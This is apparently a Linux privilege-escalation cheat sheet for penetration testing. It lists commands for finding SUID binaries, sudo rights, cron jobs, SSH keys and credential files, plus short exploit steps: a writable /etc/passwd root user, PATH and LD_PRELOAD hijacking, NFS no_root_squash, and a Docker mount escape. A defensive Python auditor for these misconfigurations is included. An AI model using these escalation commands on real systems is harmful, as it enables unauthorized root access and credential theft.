- SUID Binaries
  - Find SUID Files: `find / -perm -4000 2>/dev/null`
  - Exploits: Use GTFOBins for known SUID binary exploits.
- `sudo -l` (Check Sudo Privileges)
  - List Privileges: `sudo -l`
  - Exploits: Look for `NOPASSWD` or exploitable commands (e.g., `vim`, `find`).
- Cron Jobs
  - View Cron Jobs: `cat /etc/crontab`, `ls -la /etc/cron.d/`
  - Exploits: Writable cron scripts or wildcard abuse.
- Writable /etc/passwd
  - Exploit: Add new root user using password hash from `openssl passwd -1`.
- SSH Keys
  - Find Keys: `find / -name "*.pem" 2>/dev/null`
  - Exploit: Use private key for SSH if no passphrase.
- Kernel Exploits
  - Check Kernel: `uname -r`
  - Exploit: Search for exploits by kernel version on Exploit-DB.
- PATH Variable Manipulation
  - Exploit: Modify `PATH` and place malicious script in writable directory.
- NFS Root Squashing
  - Check: Look for `no_root_squash` in `/etc/exports`
  - Exploit: Mount and access with root on NFS share.
- World-Writable Files
  - Find (directories writable by the current user): `find / -writable -type d 2>/dev/null`
  - Exploit: Overwrite world-writable scripts or binaries.
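As an added defender-side check that is not part of the original cheat sheet, the Python below audits a host for the misconfigurations the SUID, writable /etc/passwd, NFS root squashing and world-writable sections describe: it flags setuid-root binaries, world-writable files and non-sticky directories, group/other-writable critical files, and exports with `no_root_squash`. The `CRITICAL` path set and the `/etc/exports` sample are assumptions of this example.

```python
import os, re, stat, sys
# Files where write access for group or other is a direct path to root (assumed set)
CRITICAL = {"/etc/passwd", "/etc/shadow", "/etc/sudoers", "/etc/crontab"}
# Constructed /etc/exports sample so the parser can be exercised offline
SAMPLE_EXPORTS = """\
/srv/share  10.0.0.0/24(rw,sync,no_root_squash)
/srv/public *(ro,sync)   # root_squash is the default
"""

def exports_no_root_squash(text):
    """Return (export_path, client) pairs whose option list contains no_root_squash."""
    findings = []
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()  # strip comments; blank lines give []
        for client in parts[1:]:
            m = re.match(r"([^(]*)\((.*)\)", client)  # host(opt,opt,...) form
            if m and "no_root_squash" in m.group(2).split(","):
                findings.append((parts[0], m.group(1) or "*"))
    return findings

def mode_issues(path, mode, uid=0):
    """Classify a file from its st_mode bits and owner uid; pure, so it needs no I/O."""
    issues = []
    if stat.S_ISREG(mode) and mode & stat.S_ISUID:
        issues.append("setuid-root" if uid == 0 else "setuid")
    if mode & stat.S_IWOTH and not (stat.S_ISDIR(mode) and mode & stat.S_ISVTX):
        # sticky world-writable dirs such as /tmp are expected; anything else is flagged
        issues.append("world-writable-dir" if stat.S_ISDIR(mode) else "world-writable")
    if path in CRITICAL and mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append("critical-file-writable")
    return issues

def scan(root="/"):  # walk root and yield (path, issues) for every flagged entry
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            issues = mode_issues(p, st.st_mode, st.st_uid)
            if issues:
                yield p, issues

if __name__ == "__main__":
    exports = open("/etc/exports").read() if os.path.exists("/etc/exports") else SAMPLE_EXPORTS
    for path, client in exports_no_root_squash(exports):
        print("no_root_squash:", path, "exported to", client)
    for p, issues in scan(sys.argv[1] if len(sys.argv) > 1 else "/"):
        print(p, ",".join(issues))
```

Run it as root with an optional start directory argument; setuid-root hits should be reconciled against the distribution's expected list, and anything under `world-writable` or `critical-file-writable` is a finding to fix.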
- LD_PRELOAD and LD_LIBRARY_PATH
  - Exploit: Inject code with custom library:
    `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`, then `LD_PRELOAD=./shell.so <vulnerable_program>`
- Docker Privilege Escalation
  - Exploit: Mount root filesystem and escape container: `docker run -v /:/mnt --rm -it alpine chroot /mnt sh`
- Password and Credential Files
  - Find Sensitive Files: `find / -name "*.bak" 2>/dev/null`, `find / -name "*.old" 2>/dev/null`, `grep -ri "password" /path/to/directory`